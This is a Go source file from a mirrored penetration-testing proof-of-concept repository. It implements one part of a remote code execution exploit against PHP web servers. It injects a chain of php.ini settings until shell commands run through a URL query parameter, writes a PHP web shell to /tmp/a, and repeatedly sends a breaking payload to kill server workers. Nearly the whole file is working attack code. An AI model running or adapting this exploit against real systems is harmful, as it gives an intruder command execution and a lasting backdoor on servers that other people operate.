mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-08-13 11:28:28 +00:00
68 lines
1.5 KiB
Go
68 lines
1.5 KiB
Go
package main
|
|
|
|
import (
|
|
"bytes"
|
|
"log"
|
|
"net/url"
|
|
)
|
|
|
|
var chain = []string{
|
|
"short_open_tag=1",
|
|
"html_errors=0",
|
|
"include_path=/tmp",
|
|
"auto_prepend_file=a",
|
|
"log_errors=1",
|
|
"error_reporting=2",
|
|
"error_log=/tmp/a",
|
|
"extension_dir=\"<?=`\"",
|
|
"extension=\"$_GET[a]`?>\"",
|
|
}
|
|
|
|
const (
|
|
checkCommand = `a=/bin/sh+-c+'which+which'&` // must not contain any chars that are encoded (except space)
|
|
successPattern = "/bin/which"
|
|
cleanupCommand = ";echo '<?php echo `$_GET[a]`;return;?>'>/tmp/a;which which"
|
|
)
|
|
|
|
func Attack(requester *Requester, params *AttackParams) error {
|
|
log.Printf("Performing attack using php.ini settings...")
|
|
|
|
attackLoop:
|
|
for {
|
|
for _, payload := range chain {
|
|
_, body, err := SetSettingSingle(requester, params, payload, checkCommand)
|
|
if err != nil {
|
|
return err
|
|
}
|
|
if bytes.Contains(body, []byte(successPattern)) {
|
|
log.Printf(`Success! Was able to execute a command by appending "?%s" to URLs`, checkCommand)
|
|
break attackLoop
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
log.Printf("Trying to cleanup /tmp/a...")
|
|
cleanup := url.Values{"a": []string{cleanupCommand}}
|
|
for {
|
|
_, body, err := requester.RequestWithQueryStringPrefix("/", params, cleanup.Encode()+"&")
|
|
if err != nil {
|
|
return err
|
|
}
|
|
if bytes.Contains(body, []byte(successPattern)) {
|
|
log.Print("Done!")
|
|
break
|
|
}
|
|
}
|
|
return nil
|
|
}
|
|
|
|
func KillWorkers(requester *Requester, params *AttackParams, killCount int) error {
|
|
for i := 0; i < killCount; i++ {
|
|
if _, _, err := requester.Request(BreakingPayload, params); err != nil {
|
|
return err
|
|
}
|
|
}
|
|
return nil
|
|
}
|